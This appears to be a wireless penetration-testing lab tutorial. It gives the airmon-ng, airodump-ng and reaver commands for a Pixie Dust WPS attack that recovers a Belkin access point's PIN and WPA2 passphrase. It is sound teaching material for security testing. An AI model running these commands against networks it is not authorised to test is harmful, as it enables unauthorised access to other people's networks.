
Lab: Crack WPA2 PSK network with Reaver & PixieWPS
Scenario

Attacker – Kali Linux(Sana) Machine (not VM)

Target – Belkin AP

Step 1: Initial Setup

Start a monitor-mode interface in order to capture packets from the air.

Command: service network-manager stop


Command: airmon-ng check

Kill interfering processes. Do this repeatedly for all listed processes until airmon-ng check
reports that there are no interfering processes.

Command: kill -9 <pid>

Start the monitor interface.

Command: airmon-ng check

Command: iwconfig

Command: airmon-ng start wlan0 <replace with yours>

Reaver Initial Setup


Step 2: Start Capture & Select Target

Airodump-ng dumps the packets received on the monitor interface. We can choose whether
or not to write the packets to a file. A full tutorial on this will be coming in the near future.

Command: airodump-ng wlan0mon <replace with yours>

Starting Capture

Running airodump-ng turns the terminal into a continuously updating display of all the
networks it sees. Note the target's BSSID, channel and ESSID. Press Ctrl+C to stop airodump-ng.

Run reaver with relevant info.

Command: reaver -i wlan0mon <replace with yours> -b <bssid> -c <channel no> -K 1 -vv

Capture & Reaver Output

From the above figure, we can get the MAC of our target. Make a note of this, then run
reaver.
Pixie Output

There you have the passphrase and the PIN. This is therefore a combined offline/online attack
that can be run against wireless access points during wireless penetration tests.
Interestingly, PixieWPS also reveals other information such as the AP's model number and
manufacturer, so during a test one can use this to search for commonly known vulnerabilities
of the specific AP.

For best performance of the attack, use an Alfa Network AWUS036NH or a similar model.

Related Video: https://vimeo.com/126489367
